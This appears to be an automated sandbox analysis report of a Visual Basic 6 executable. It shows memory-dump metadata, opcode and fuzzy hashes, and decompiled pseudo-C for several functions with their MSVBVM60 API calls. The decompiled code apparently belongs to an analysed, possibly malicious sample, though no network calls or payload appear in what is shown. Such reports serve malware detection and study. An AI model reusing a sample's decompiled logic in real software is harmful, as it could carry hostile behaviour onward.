0x00407879
0x0040787b
0x0040787f
0x00407881
0x00407885
0x00407887
0x0040788b
0x0040788c
0x0040788e
0x00407890
0x00407892
0x00407894
0x00407895
0x0040789b
0x0040789d
0x0040789f
0x004078b0
0x004078b2
0x004078b9
0x004078c1
0x004078c3
0x004078c6
0x004078cc
0x004078d4
0x004078d6
0x004078d8
0x004078dc
0x004078e8
0x004078e9
0x004078ef
0x004078f0
0x004078f1
0x004078fb
0x004078ff
0x0040790a
0x0040790d
0x0040791e
0x00407923
0x00407925
0x00407925
0x00407926
0x00407966
0x00407966
0x00407968
0x0040796c
0x0040796e
0x00407972
0x00407974
0x00407978
0x0040797a
0x0040797e
0x00407980
0x00407984
0x00407986
0x0040798a
0x0040798c
0x00407990
0x00407992
0x00407994
0x00407996
0x00407999
0x0040799a
0x004079a4
0x004079a6
0x004079b1
0x004079b2
0x004079b2
0x004079b8
0x004079b8
0x004079b9
0x004079b9
0x00000000
0x004079b9
0x0040792b
0x0040792d
0x0040792f
0x0040792f
0x00407939
0x00407939
0x0040793f
0x00000000
0x00000000
0x00407941
0x00407942
0x00407948
0x00407949
0x00000000
0x00000000
0x00407950
0x00407952
0x0040795a
0x00000000
0x0040795a
0x0040795e
0x0040795f
0x00407961
0x00000000

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4793e650aaaaaddd15a69b11f15817178076d7b5be93964a07b1fa75afa85e2a
Instruction ID: a4c11d62886b0d23f3865277699e6bd564fcade4985fe660f7a6d486aaa27876
Opcode Fuzzy Hash: 4793e650aaaaaddd15a69b11f15817178076d7b5be93964a07b1fa75afa85e2a
Instruction Fuzzy Hash: C13138354583908FD723CF38C0A86953FA0EF4722536948EAC0818F566D62AA856DB53

Uniqueness

Uniqueness Score: -1.00%

Function 02AE4E71, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ce0afc3e76143805caa622e1950f56349fa088794c6e438e37519c23148d40
Instruction ID: 4b9c84f1365ec629bc2ba77b5c07fc05cd249174d06de8337a804b448423aae7
Opcode Fuzzy Hash: 60ce0afc3e76143805caa622e1950f56349fa088794c6e438e37519c23148d40
Instruction Fuzzy Hash: F331E171A05785CFEB34CF25D9A53DA3BE1AF89308F84416AD85E9F608D731A642CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02AE8DDD, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d7e98e8133a2bcbf13867bb1ea35e6b83e197fcb10380ed8679150a28c7811
Instruction ID: d63d4a9c57e9ee3ff4c7e84b16c4bc9a2612696caab228d4a4bb5ba46d486a05
Opcode Fuzzy Hash: 90d7e98e8133a2bcbf13867bb1ea35e6b83e197fcb10380ed8679150a28c7811
Instruction Fuzzy Hash: 4321937970438A8FCF20DF39C9D03DA27A2AF9A754F4882199D4A8B265DB348947CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02AE4C08, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec3a99731c5703c05a102d48d12ba03804c66f0dc90e84e0159a04b7b4d3e98
Instruction ID: 3889c9274b6b95320515d0bd8ba5001d24cb048cd66ce48a532c36ff09060391
Opcode Fuzzy Hash: fec3a99731c5703c05a102d48d12ba03804c66f0dc90e84e0159a04b7b4d3e98
Instruction Fuzzy Hash: B9316D301087C58BDF268FB88888B957FA1AF07324F0982DEC8994F6D7E735514ACB06

Uniqueness

Uniqueness Score: -1.00%

Function 02AE81DB, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72731e658477de901dbed70ad9847fbb389bbed4ee44f86c014666b7671aff49
Instruction ID: 9e1ddb3c43ea63f170341ba4e64c73872c234407c3309f678e2edcaeda8769d1
Opcode Fuzzy Hash: 72731e658477de901dbed70ad9847fbb389bbed4ee44f86c014666b7671aff49
Instruction Fuzzy Hash: 60219A35A5D245CFEBA8AE30D9156FBB7F0AF51340F45080E98CB97120DB384A82CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02AE9AA6, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb6a19d485d2f376ce4f4a464d06ff11789f3769116286ac827ea248995caf4
Instruction ID: b15535d05036e7f0c3e6e3d15a482f0f0dff5f06ca2deb45e720360d1a1f5f62
Opcode Fuzzy Hash: cdb6a19d485d2f376ce4f4a464d06ff11789f3769116286ac827ea248995caf4
Instruction Fuzzy Hash: 7B11E3B2904395CFDF70DEB889A97EA37A5AF19340F01012E9D4AEB210D6309F058741

Uniqueness

Uniqueness Score: -1.00%

Function 02AE8F0C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e467b6cfab6ccd1ce2d3ad3d883c71a44a9fa2339eb255ae104a20a6344b49d7
Instruction ID: ae33ad2c74a0b1ab96bc51463c166203b7813af25ea4c0fc949d24b7699641ef
Opcode Fuzzy Hash: e467b6cfab6ccd1ce2d3ad3d883c71a44a9fa2339eb255ae104a20a6344b49d7
Instruction Fuzzy Hash: 3C010475244688CFCF38DF15C999AEE73B2EB58350F11406AEC0A9B325CB34AA05CB16

Uniqueness

Uniqueness Score: -1.00%

Function 02AE89A8, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00411095, Relevance: 37.7, APIs: 25, Instructions: 246
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00411095(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v36;
				char _v48;
				short _v56;
				signed int _v60;
				void* _v64;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				char* _t171;
				signed int _t172;
				char* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr _t230;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t230;
				L00401230();
				_v12 = _t230;
				_v8 = 0x4011a0;
				_push(2);
				_push(0x4029f4);
				_push( &_v48);
				L00401332();
				_push( &_v80);
				L00401302();
				_t171 =  &_v80;
				_push(_t171);
				L00401308();
				_v92 =  ~(0 | _t171 != 0x0000ffff);
				L00401392();
				_t172 = _v92;
				if(_t172 != 0) {
					_v92 = _v92 & 0x00000000;
					if(_v92 >= 0xb) {
						L00401320();
						_v116 = _t172;
					} else {
						_v116 = _v116 & 0x00000000;
					}
					_t175 = _v92;
					 *((short*)(_v36 + _t175 * 2)) = 0x273d;
					_v92 = 1;
					if(_v92 >= 0xb) {
						L00401320();
						_v120 = _t175;
					} else {
						_v120 = _v120 & 0x00000000;
					}
					_t176 = _v92;
					 *((short*)(_v36 + _t176 * 2)) = 0x32b3;
					_v92 = 2;
					if(_v92 >= 0xb) {
						L00401320();
						_v124 = _t176;
					} else {
						_v124 = _v124 & 0x00000000;
					}
					_t177 = _v92;
					 *((short*)(_v36 + _t177 * 2)) = 0x5452;
					_v92 = 3;
					if(_v92 >= 0xb) {
						L00401320();
						_v128 = _t177;
					} else {
						_v128 = _v128 & 0x00000000;
					}
					_t178 = _v92;
					 *((short*)(_v36 + _t178 * 2)) = 0x23cd;
					_v92 = 4;
					if(_v92 >= 0xb) {
						L00401320();
						_v132 = _t178;
					} else {
						_v132 = _v132 & 0x00000000;
					}
					_t179 = _v92;
					 *((short*)(_v36 + _t179 * 2)) = 0x4b95;
					_v92 = 5;
					if(_v92 >= 0xb) {
						L00401320();
						_v136 = _t179;
					} else {
						_v136 = _v136 & 0x00000000;
					}
					_t180 = _v92;
					 *((short*)(_v36 + _t180 * 2)) = 0x295;
					_v92 = 6;
					if(_v92 >= 0xb) {
						L00401320();
						_v140 = _t180;
					} else {
						_v140 = _v140 & 0x00000000;
					}
					_t181 = _v92;
					 *((short*)(_v36 + _t181 * 2)) = 0x4b3b;
					_v92 = 7;
					if(_v92 >= 0xb) {
						L00401320();
						_v144 = _t181;
					} else {
						_v144 = _v144 & 0x00000000;
					}
					_t182 = _v92;
					 *((short*)(_v36 + _t182 * 2)) = 0x53ee;
					_v92 = 8;
					if(_v92 >= 0xb) {
						L00401320();
						_v148 = _t182;
					} else {
						_v148 = _v148 & 0x00000000;
					}
					_t183 = _v92;
					 *((short*)(_v36 + _t183 * 2)) = 0xf1c;
					_v92 = 9;
					if(_v92 >= 0xb) {
						L00401320();
						_v152 = _t183;
					} else {
						_v152 = _v152 & 0x00000000;
					}
					_t184 = _v92;
					 *((short*)(_v36 + _t184 * 2)) = 0x4ebe;
					_v92 = 0xa;
					if(_v92 >= 0xb) {
						L00401320();
						_v156 = _t184;
					} else {
						_v156 = _v156 & 0x00000000;
					}
					 *((short*)(_v36 + _v92 * 2)) = 0x4aa1;
					if( *0x413418 != 0) {
						_v160 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v160 = 0x413418;
					}
					_v92 =  *_v160;
					_t191 =  *((intOrPtr*)( *_v92 + 0x14))(_v92,  &_v64);
					asm("fclex");
					_v96 = _t191;
					if(_v96 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40292c);
						_push(_v92);
						_push(_v96);
						L0040136E();
						_v164 = _t191;
					}
					_v100 = _v64;
					_t196 =  *((intOrPtr*)( *_v100 + 0xb8))(_v100,  &_v84);
					asm("fclex");
					_v104 = _t196;
					if(_v104 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xb8);
						_push(0x402950);
						_push(_v100);
						_push(_v104);
						L0040136E();
						_v168 = _t196;
					}
					_v56 = _v84;
					L00401368();
					if( *0x413418 != 0) {
						_v172 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v172 = 0x413418;
					}
					_v92 =  *_v172;
					_t203 =  *((intOrPtr*)( *_v92 + 0x48))(_v92, 0x4c,  &_v60);
					asm("fclex");
					_v96 = _t203;
					if(_v96 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40292c);
						_push(_v92);
						_push(_v96);
						L0040136E();
						_v176 = _t203;
					}
					_v112 = _v60;
					_v60 = _v60 & 0x00000000;
					L004013A4();
				}
				_push(0x411467);
				L004013B0();
				_v88 =  &_v48;
				_t174 =  &_v88;
				_push(_t174);
				_push(0);
				L0040131A();
				return _t174;
			}

0x0041109a
0x004110a5
0x004110a6
0x004110b2
0x004110ba
0x004110bd
0x004110c4
0x004110c6
0x004110ce
0x004110cf
0x004110d7
0x004110d8
0x004110dd
0x004110e0
0x004110e1
0x004110f1
0x004110f8
0x004110fd
0x00411103
0x00411109
0x00411111
0x00411119
0x0041111e
0x00411113
0x00411113
0x00411113
0x00411121
0x00411127
0x0041112d
0x00411138
0x00411140
0x00411145
0x0041113a
0x0041113a
0x0041113a
0x00411148
0x0041114e
0x00411154
0x0041115f
0x00411167
0x0041116c
0x00411161
0x00411161
0x00411161
0x0041116f
0x00411175
0x0041117b
0x00411186
0x0041118e
0x00411193
0x00411188
0x00411188
0x00411188
0x00411196
0x0041119c
0x004111a2
0x004111ad
0x004111b5
0x004111ba
0x004111af
0x004111af
0x004111af
0x004111bd
0x004111c3
0x004111c9
0x004111d4
0x004111df
0x004111e4
0x004111d6
0x004111d6
0x004111d6
0x004111ea
0x004111f0
0x004111f6
0x00411201
0x0041120c
0x00411211
0x00411203
0x00411203
0x00411203
0x00411217
0x0041121d
0x00411223
0x0041122e
0x00411239
0x0041123e
0x00411230
0x00411230
0x00411230
0x00411244
0x0041124a
0x00411250
0x0041125b
0x00411266
0x0041126b
0x0041125d
0x0041125d
0x0041125d
0x00411271
0x00411277
0x0041127d
0x00411288
0x00411293
0x00411298
0x0041128a
0x0041128a
0x0041128a
0x0041129e
0x004112a4
0x004112aa
0x004112b5
0x004112c0
0x004112c5
0x004112b7
0x004112b7
0x004112b7
0x004112d1
0x004112de
0x004112fb
0x004112e0
0x004112e0
0x004112e5
0x004112ea
0x004112ef
0x004112ef
0x0041130d
0x0041131c
0x0041131f
0x00411321
0x00411328
0x00411344
0x0041132a
0x0041132a
0x0041132c
0x00411331
0x00411334
0x00411337
0x0041133c
0x0041133c
0x0041134e
0x0041135d
0x00411363
0x00411365
0x0041136c
0x0041138b
0x0041136e
0x0041136e
0x00411373
0x00411378
0x0041137b
0x0041137e
0x00411383
0x00411383
0x00411396
0x0041139d
0x004113a9
0x004113c6
0x004113ab
0x004113ab
0x004113b0
0x004113b5
0x004113ba
0x004113ba
0x004113d8
0x004113e9
0x004113ec
0x004113ee
0x004113f5
0x00411411
0x004113f7
0x004113f7
0x004113f9
0x004113fe
0x00411401
0x00411404
0x00411409
0x00411409
0x0041141b
0x0041141e
0x00411428
0x00411428
0x0041142d
0x00411450
0x00411458
0x0041145b
0x0041145e
0x0041145f
0x00411461
0x00411466

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 004110B2
__vbaAryConstruct2.MSVBVM60(?,004029F4,00000002,?,?,?,?,00401236), ref: 004110CF
#610.MSVBVM60(?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110D8
#557.MSVBVM60(?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110E1
__vbaFreeVar.MSVBVM60(?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 004110F8
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411119
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411140
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411167
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 0041118E
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004111B5
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004111DF
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 0041120C
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411239
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411266
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 00411293
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4,00000002), ref: 004112C0
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,?,?,?,?,?,?,?,?,?,?,?,004029F4), ref: 004112EA
__vbaHresultCheckObj.MSVBVM60(00000000,0000000B,0040292C,00000014), ref: 00411337
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,000000B8), ref: 0041137E
__vbaFreeObj.MSVBVM60(00000000,?,00402950,000000B8), ref: 0041139D
__vbaNew2.MSVBVM60(0040293C,00413418), ref: 004113B5
__vbaHresultCheckObj.MSVBVM60(00000000,0000000B,0040292C,00000048), ref: 00411404
__vbaStrMove.MSVBVM60(00000000,0000000B,0040292C,00000048), ref: 00411428
__vbaFreeStr.MSVBVM60(00411467,?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 00411450
__vbaAryDestruct.MSVBVM60(00000000,?,00411467,?,?,?,004029F4,00000002,?,?,?,?,00401236), ref: 00411461

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$CheckFreeHresult$New2$#557#610ChkstkConstruct2DestructMove
String ID:
API String ID: 2040534524-0
Opcode ID: a76b7f3ee1b212ad672dac9041d3fdd7de6b1e558f20a34687fc7efd238bffd6
Instruction ID: 6d04e2fae51a1a39a77b55eeb4be8abc18a85861e2ba32858722686cf3167da9
Opcode Fuzzy Hash: a76b7f3ee1b212ad672dac9041d3fdd7de6b1e558f20a34687fc7efd238bffd6
Instruction Fuzzy Hash: 8EC1C274D00258DFEB10DFD4C985BEDBBB0BF09319F2040AAE505BA6A5D7781989CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00410008, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00410008(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				intOrPtr _v44;
				char _v60;
				char* _t28;
				void* _t48;
				void* _t50;
				intOrPtr _t51;

				_t51 = _t50 - 0xc;
				 *[fs:0x0] = _t51;
				L00401230();
				_v16 = _t51;
				_v12 = 0x401170;
				_v8 = 0;
				_t28 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x401236, _t48);
				L00401350();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x4028fc);
				_push(_v44);
				L0040134A();
				L004013A4();
				_push(_v44);
				_push(0x40299c);
				L00401344();
				if(_t28 != 0) {
					_push(1);
					_push(1);
					_push(1);
					_push( &_v60);
					L00401398();
					_push( &_v60);
					L0040139E();
					L004013A4();
					L00401392();
					_push(1);
					_push(1);
					_push(1);
					_push( &_v60);
					L00401398();
					_t28 =  &_v60;
					_push(_t28);
					L0040139E();
					L004013A4();
					L00401392();
					L0040133E();
				}
				_v32 = 0x7e990720;
				_v28 = 0x5af7;
				_push(0x410115);
				L004013B0();
				L004013B0();
				L004013B0();
				return _t28;
			}

0x0041000b
0x0041001a
0x00410024
0x0041002c
0x0041002f
0x00410036
0x00410045
0x00410050
0x00410055
0x00410057
0x00410059
0x0041005b
0x0041005d
0x00410062
0x00410065
0x0041006f
0x00410074
0x00410077
0x0041007c
0x00410083
0x00410085
0x00410087
0x00410089
0x0041008e
0x0041008f
0x00410097
0x00410098
0x004100a2
0x004100aa
0x004100af
0x004100b1
0x004100b3
0x004100b8
0x004100b9
0x004100be
0x004100c1
0x004100c2
0x004100cc
0x004100d4
0x004100d9
0x004100d9
0x004100de
0x004100e5
0x004100ec
0x004100ff
0x00410107
0x0041010f
0x00410114

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 00410024
__vbaStrCopy.MSVBVM60(?,?,?,?,00401236), ref: 00410050
#712.MSVBVM60(000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 00410065
__vbaStrMove.MSVBVM60(000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 0041006F
__vbaStrCmp.MSVBVM60(0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000,?,?,?,?,00401236), ref: 0041007C
#539.MSVBVM60(000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 0041008F
__vbaStrVarMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 00410098
__vbaStrMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100A2
__vbaFreeVar.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100AA
#539.MSVBVM60(000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF), ref: 004100B9
__vbaStrVarMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100C2
__vbaStrMove.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100CC
__vbaFreeVar.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100D4
__vbaEnd.MSVBVM60(000000FF,000000FF,00000001,00000001,00000001,000000FF,000000FF,00000001,00000001,00000001,0040299C,000000FF,000000FF,004028FC,00000000,00000001), ref: 004100D9
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 004100FF
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 00410107
__vbaFreeStr.MSVBVM60(00410115,0040299C,000000FF,000000FF,004028FC,00000000,00000001,000000FF,00000000), ref: 0041010F

Strings

val, xrefs: 00410048

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#539$#712ChkstkCopy
String ID: val
API String ID: 649389897-2548021861
Opcode ID: 17fac777e76b7fa26b15d37a7fd52e64fda92e63abeecefce0e157de18b6b271
Instruction ID: 5a64d03993b878f9ca2d9e60cd278fef3822f2b1fe61ea68fd5e2a6c53f6f2bc
Opcode Fuzzy Hash: 17fac777e76b7fa26b15d37a7fd52e64fda92e63abeecefce0e157de18b6b271
Instruction Fuzzy Hash: 62212E31A40208AAEB10FBA1CC86FDE7B78AF04714F50403AF501B69E1DBBD59858B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE4C, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040FE4C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				char* _t54;
				signed int _t60;
				signed int _t65;
				void* _t78;
				void* _t80;
				intOrPtr _t81;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				L00401230();
				_v16 = _t81;
				_v12 = 0x401160;
				_v8 = 0;
				_t54 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401236, _t78);
				_push(2);
				_push("ABC");
				_push(0x402970);
				_push(0);
				L00401362();
				if(_t54 != 5) {
					if( *0x413418 != 0) {
						_v108 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v108 = 0x413418;
					}
					_v80 =  *_v108;
					_t60 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v44);
					asm("fclex");
					_v84 = _t60;
					if(_v84 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40292c);
						_push(_v80);
						_push(_v84);
						L0040136E();
						_v112 = _t60;
					}
					_v88 = _v44;
					_t65 =  *((intOrPtr*)( *_v88 + 0xf8))(_v88,  &_v40);
					asm("fclex");
					_v92 = _t65;
					if(_v92 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x402950);
						_push(_v88);
						_push(_v92);
						L0040136E();
						_v116 = _t65;
					}
					_v104 = _v40;
					_v40 = _v40 & 0x00000000;
					L004013A4();
					L00401368();
					_v52 = 0x17;
					_v60 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t54 =  &_v60;
					_push(_t54);
					L0040135C();
					L004013A4();
					L00401392();
					_push(L"diktaturs");
					L00401356();
				}
				_v32 =  *0x401158;
				asm("wait");
				_push(0x40ffe1);
				L004013B0();
				L004013B0();
				return _t54;
			}

0x0040fe4f
0x0040fe5e
0x0040fe68
0x0040fe70
0x0040fe73
0x0040fe7a
0x0040fe89
0x0040fe8c
0x0040fe8e
0x0040fe93
0x0040fe98
0x0040fe9a
0x0040fea2
0x0040feaf
0x0040fec9
0x0040feb1
0x0040feb1
0x0040feb6
0x0040febb
0x0040fec0
0x0040fec0
0x0040fed5
0x0040fee4
0x0040fee7
0x0040fee9
0x0040fef0
0x0040ff09
0x0040fef2
0x0040fef2
0x0040fef4
0x0040fef9
0x0040fefc
0x0040feff
0x0040ff04
0x0040ff04
0x0040ff10
0x0040ff1f
0x0040ff25
0x0040ff27
0x0040ff2e
0x0040ff4a
0x0040ff30
0x0040ff30
0x0040ff35
0x0040ff3a
0x0040ff3d
0x0040ff40
0x0040ff45
0x0040ff45
0x0040ff51
0x0040ff54
0x0040ff5e
0x0040ff66
0x0040ff6b
0x0040ff72
0x0040ff79
0x0040ff7b
0x0040ff7d
0x0040ff7f
0x0040ff81
0x0040ff84
0x0040ff85
0x0040ff8f
0x0040ff97
0x0040ff9c
0x0040ffa1
0x0040ffa1
0x0040ffac
0x0040ffaf
0x0040ffb0
0x0040ffd3
0x0040ffdb
0x0040ffe0

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040FE68
__vbaInStrB.MSVBVM60(00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FE9A
__vbaNew2.MSVBVM60(0040293C,00413418,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FEBB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040292C,00000014), ref: 0040FEFF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF40
__vbaStrMove.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF5E
__vbaFreeObj.MSVBVM60(00000000,?,00402950,000000F8), ref: 0040FF66
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF85
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF8F
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FF97
#531.MSVBVM60(diktaturs,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0040FFA1
__vbaFreeStr.MSVBVM60(0040FFE1,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FFD3
__vbaFreeStr.MSVBVM60(0040FFE1,00000000,00402970,ABC,00000002,?,?,?,?,00401236), ref: 0040FFDB

